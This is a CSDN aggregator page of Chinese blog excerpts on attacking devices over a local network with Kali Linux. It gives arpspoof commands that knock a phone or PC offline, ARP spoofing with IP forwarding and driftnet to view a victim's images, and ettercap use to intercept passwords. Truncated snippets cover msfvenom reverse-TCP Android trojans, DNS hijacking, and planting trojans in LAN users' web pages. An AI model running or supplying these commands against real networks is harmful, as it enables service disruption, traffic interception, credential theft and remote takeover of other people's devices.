kali linux局域网_kali linux局域网入侵 - CSDN
  • kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击 首先我们打开我们熟悉的kali linux操作系统,利用指令: ifconfig 来确认本机的ip地址 确认了本机的ip地址之后,利用一下的指令...

    kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击

    首先我们打开我们熟悉的kali linux操作系统,利用指令:

    ifconfig

    来确认本机的ip地址

    确认了本机的ip地址之后,利用一下的指令查看局域网下所有ip:

    fping -g 本机IP地址/24

    如下图所示:

    因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。

    因此我们开始实施攻击,输入以下指令:

    arpspoof -i eth0 -t 192.168.1.136 192.168.1.1

    前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址

    在下面的mac地址跳出来之后,我们会发现我们的手机无论如何都不能够上网了,如果想要停止这个攻击,则输入:

    ctrl+z

    即可,如下图所示:

    这样这个攻击就停止了,我个人感觉这个过程实在是太神奇了有没有啊,哈哈哈

    posted @ 2019-05-21 16:08 Geeksongs 阅读(...) 评论(...) 编辑 收藏
    展开全文
  • 特别声明: 我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播。请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情。...

    特别声明:
    我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播。请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情。

    Special statement:
    The purpose of our study of cyber security technology should be to maintain the security of the cyber world and protect the private information of ourselves and others from being illegally stolen and disseminated. Please comply with your local laws. Do not take advantage of the relevant technology introduced in this article to do anything that deviates from morality or against the law.

    前言:

    ARP攻击是基于ARP协议的工作模式进行的,关于ARP协议和ARP攻击的基础知识请查看我的这篇博文ARP协议与ARP攻击入门

    ARP攻击能够实现的技术前提有两个,一是作为攻击者的计算机需要和被攻击者的计算机在一个局域网中,二是作为攻击者的计算机需要知道被攻击者计算机的局域网IP。本文将模拟真实的攻击过程,在不与被攻击的计算机发生物理接触的情况下实现对其的局域网断网攻击。

    网络拓扑图

    图 1
    图 1

    注:在这里,作为攻击者的计算机使用的是安装在VMware Workstation中的Kali Linux,我们需要在VMware的设置中将Kali的联网方式改为“桥接模式”,并且不要勾选“复制物理网络连接状态”。

    获取目标主机IP

    在这里,我们使用Ettercap对内网进行扫描以获取目标主机IP和网关的信息。输入命令:

    ettercap -G

    打开Ettercap的GUI界面:
    图 2
    图 2

    依次点击“Sniff(嗅探) -> Unified sniffing(统一嗅探)”,之后弹出如下界面让选择进行扫描的网络接口(Network interface):
    图 3
    图 3

    这里我们使用默认的eth0端口。点击“OK”。

    之后依次点击“Hosts(主机) -> Scan for hosts(扫描主机)”。
    这时会出现一个进度条,等待进度条结束,依次点击“Hosts -> Hosts list(主机列表)”即可显示本机所在局域网中除本机之外,当前已连接至网络的设备的IP地址和MAC地址:
    图 4
    图 4

    注:Ettercap扫描结果的第一项一般是本局域网中的网关,如图中的192.168.50.1就是实验时局域网中的默认网关。

    这样我们就获得了目标主机的IP和本局域网的网关。

    对局域网内的目标主机实施断网攻击

    我们使用Kali Linux中的Arpspoof进行ARP攻击。

    在实施断网攻击前,我们先测试一下目标主机192.168.50.130是不是能上网,输入命令:

    ping www.baidu.com

    发现可以Ping通,说明目标主机在攻击开始之前是可以上网的。

    在我们的攻击机上,即Kali中,输入命令:

    arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
    e.g:
    arpspoof -i eth0 -t 192.168.50.130 192.168.50.1

    回车就开始对目标主机进行断网攻击了,此时我们在目标主机上执行命令:

    ping www.baidu.com

    就会返回一个错误提示:“Ping请求找不到主机www.baidu.com”。

    通过上述命令产生的Arpspoof的攻击进程不会自动停止,除非当前攻击链路被中断,如攻击机关机或者断开与当前局域网的连接,或目标机关机或者断开与当前局域网的连接或者更改了其在当前局域网内的IP地址。我们可以在Arpspoof进程所在终端上使用“Ctrl+Z”手动关闭Arpspoof的攻击进程。

    关闭Arpspoof的攻击进程后,之前被攻击的目标主机一般会在几秒钟的时间内自动恢复正常的网络连接。

    附:
    Ettercap0.8.2的帮助信息(命令ettercap -help):

    ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
    
    
    Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]
    
    TARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)
    
    Sniffing and Attack options:
      -M, --mitm <METHOD:ARGS>    perform a mitm attack
      -o, --only-mitm             don't sniff, only perform the mitm attack
      -b, --broadcast             sniff packets destined to broadcast
      -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)
      -p, --nopromisc             do not put the iface in promisc mode
      -S, --nosslmitm             do not forge SSL certificates
      -u, --unoffensive           do not forward packets
      -r, --read <file>           read data from pcapfile <file>
      -f, --pcapfilter <string>   set the pcap filter <string>
      -R, --reversed              use reversed TARGET matching
      -t, --proto <proto>         sniff only this proto (default is all)
          --certificate <file>    certificate file to use for SSL MiTM
          --private-key <file>    private key file to use for SSL MiTM
    
    User Interface Type:
      -T, --text                  use text only GUI
           -q, --quiet                 do not display packet contents
           -s, --script <CMD>          issue these commands to the GUI
      -C, --curses                use curses GUI
      -D, --daemon                daemonize ettercap (no GUI)
      -G, --gtk                   use GTK+ GUI
    
    Logging options:
      -w, --write <file>          write sniffed data to pcapfile <file>
      -L, --log <logfile>         log all the traffic to this <logfile>
      -l, --log-info <logfile>    log only passive infos to this <logfile>
      -m, --log-msg <logfile>     log all the messages to this <logfile>
      -c, --compress              use gzip compression on log files
    
    Visualization options:
      -d, --dns                   resolves ip addresses into hostnames
      -V, --visual <format>       set the visualization format
      -e, --regex <regex>         visualize only packets matching this regex
      -E, --ext-headers           print extended header for every pck
      -Q, --superquiet            do not display user and password
    
    LUA options:
          --lua-script <script1>,[<script2>,...]     comma-separted list of LUA scripts
          --lua-args n1=v1,[n2=v2,...]               comma-separated arguments to LUA script(s)
    
    General options:
      -i, --iface <iface>         use this network interface
      -I, --liface                show all the network interfaces
      -Y, --secondary <ifaces>    list of secondary network interfaces
      -n, --netmask <netmask>     force this <netmask> on iface
      -A, --address <address>     force this local <address> on iface
      -P, --plugin <plugin>       launch this <plugin>
      -F, --filter <file>         load the filter <file> (content filter)
      -z, --silent                do not perform the initial ARP scan
      -6, --ip6scan               send ICMPv6 probes to discover IPv6 nodes on the link
      -j, --load-hosts <file>     load the hosts list from <file>
      -k, --save-hosts <file>     save the hosts list to <file>
      -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)
      -a, --config <config>       use the alterative config file <config>
    
    Standard options:
      -v, --version               prints the version and exit
      -h, --help                  this help screen

    end
    更多内容请访问我的个人网站荒原之梦

    展开全文
  • windsow下内网上线很简单,也比较容易理解,换做kali linux也是一样的,下面介绍花生壳内网穿透,以此来记录自己的成长历程。 实验环境: 虚拟机,kali linux 2.0,phddns_3.0_x86_64.deb(花生壳linux安装包) ...

    windsow下内网上线很简单,也比较容易理解,换做kali linux也是一样的,下面介绍花生壳内网穿透,以此来记录自己的成长历程。

    实验环境:

    虚拟机,kali linux 2.0,phddns_3.0_x86_64.deb(花生壳linux安装包)

     

    1.在虚拟机中启动kali linux 2.0,安装phddns_3.0_x86_64.deb

    step1:在花生壳官网下载软件 phddns_3.0_x86_64.deb

    step2:我是把安装文件phddns_3.0_x86_64.deb放在共享文件夹内了,也可以直接复制进kali 中

    进入共享文件夹内,复制粘贴在桌面上。

    命令:cp phddns_3.0.......           /root/Desktop/

    step3:安装花生壳软件

    命令:dpkg -i 安装包名称

    step4:启动花生壳。

    命令:phddns start

    step5:在花生壳官网进行设置内网穿透。

    火狐浏览器打开:http://b.oray.cm

    使用用户名:SN内容

    密码:admin

    登陆后,申请 一个免费的壳域名。

    step6:点击内网穿透页面的“+”,添加穿透参数。

    step7:点击”确定“,现在内网穿透就成功了,接下来验证。

    打开浏览器,输入:www.ip138.com查看自己的ip地址,即为自己的公网ip地址。

    step8:启动apache2服务

    命令:service apache2 start 

    命令:service apache2 status

    step9:修改/var/www/html中的文件,将域名发给别人点击,http://261ep35159.qicp.vip/text.txt成功上线。

     

     

     

    展开全文
  • 工具:ArpSpoof命令: arpspoof -i (网卡) -t (目标IP 网关) 网卡:kali虚拟机 = eth0 (ifconfig命令查询) 目标IP: win10物理机 = 169.254.xxx.xxx(cmd --&gt; ipconfig) 网关:win10 = 192.168....

    工具:ArpSpoof

    命令:

       ARP欺骗:目标的IP流量经过攻击机网卡,从网关出去

            1、echo 1 >/proc/sys/net/ipv4/ip_forward(进行IP流量转发)

            2、arpspoof -i (网卡) -t  (目标网关 目标IP)

          (3、driftnet -i eth0 【获取流量浏览图片】)

        ARP断网命令:目标的IP流量经过攻击机网卡,不从网关出去

        arpspoof -i (网卡) -t  (目标网关 目标IP)

        网卡:kali虚拟机 = eth0 (ifconfig命令查询)

        目标IP: win10物理机 = 169.254.xxx.xxx(cmd --> ipconfig)

        网关:win10 = 192.168.1.1

       

        注:局域网IP查询

            fping -asg 192.168.1.0(局域网前三段加0)/24

    展开全文
  • 进入Kali Linux启动Sniffing/Spoofing>Network Sniffers>Ettercap 1、切换到Sniff标签,点击Unified sniffing…,选择wlan0网络接口,(wlan0 是无线接口eth0 是有线接口) 2、Host标签,点击Scan for hosts,很快...
  • kali机:192.168.198.134 win10:192.168.198.1 我们先来查看下自己的IP地址 接着我们使用fping来扫描一下局域网内的所有IP fping -g IP/24 -->扫描局域网内所有IP 攻击正式开始 1.我们先用msfvenom来生成一个...
  • kali机:192.168.198.134 安卓机:192.168.198.1 安卓版本:5.0.1 我们先来查看下自己的IP地址 接着我们使用fping来扫描一下局域网内的所有IP fping -g IP/24 -->扫描局域网内所有IP 攻击正式开始 1.我们先用...
  • 命令1:在linux系统里ifconfig显示或配置网络设备 命令2:在winodws里ifconfig显示或配置网络设备 客户端winxp系统 微软开发windowsxp,windows2000,windows7,windows10.windows2003大家都在用wi...
  • 1.桥接--> 2.使用命令  -------->ettercap -i 网卡 -Tq -M arp:remote /目标IP//网关/ 3.使用命令查看  ------------>driftnet -i 网卡 -b
  • 局域网账号密码截取:echo 1 >/proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/ip_forward 显示1则显示上一条命令执行成功使用:arpspoof -i eth0 -t IP地址 网关ettercap -Tq -i eth0 -Tq 启动文本模式,q...
  • kali是一个用于局域网入侵检测的linux系统,挺好用的,想玩的小伙伴可以在自己的虚拟机上安装试试,仅用来学习研究使用,不要用于非法用途哦 第一步、打开终端,输入以下命令,这个命令是扫描192.168.1.0/24这个网段...
  • ping扫描:扫描192.168.0.0/24网段上有哪些主机是存活的;   [root@laolinux ~]# nmap -sP 192.168.0.0/24 Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at... Host laolinux (192.168.0.3) appears t
  • https://jingyan.baidu.com/article/5553fa828a1b6e65a339347f.html https://blog.csdn.net/u012749168/article/details/52689705/
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 输入上述命令生成木马,这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功 只有9K多大小 3、...
  •  通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机  准备  kali系统  metaspolit的使用  Arp欺骗工具:bettercap  博客园账号密码(用来上传小马...
  • 工作需求中,要进行同局域网中指定设备上的图片获取。在kali中,已经集成好了arpspoof和driftnet,用这两者完成需求。过程步骤与网上其他博客想类似,在这里仅记录归纳,如下: 1.确保攻击者与被攻击者均在同一...
  • kali局域网ARP攻击二 再次声明: 小白一枚 小白一枚 小白一枚 第一次我们写到ARP的断网攻击,使目标IP的网络不可以使用,这样很容易让对方察觉到,自己的网络收到攻击。 所以出现了ARP欺骗。 ARP断网攻击是目标IP,...
  • ``1.设置允许设备通过自己网卡联网 echo 1 >... 2.获取网关 netstat -rn(注意网关要与设备名相符) 3…arp欺骗 arpspoof -i wlan0(interface) -t 192.168.1.1 (网关Gateway)192.168.1.4)(target ip) ...
  • kali linux dns劫持

    2019-09-30 22:08:38
    1,確定局域網ip 2,修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名 3,/var/www/index.html (修改html页面替换被劫持的... ...4,啓動apache2 /etc/init.d/apache2 start 启动apache服务器 ...5,etterca...
  • 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的Android手机,从而实现对受害者手机数据的读取、音频的窃听、位置的获取、软件安装或卸载等。 环境说明 ...
1 2 3 4 5 ... 20
收藏数 1,917
精华内容 766
关键字:

kali linux局域网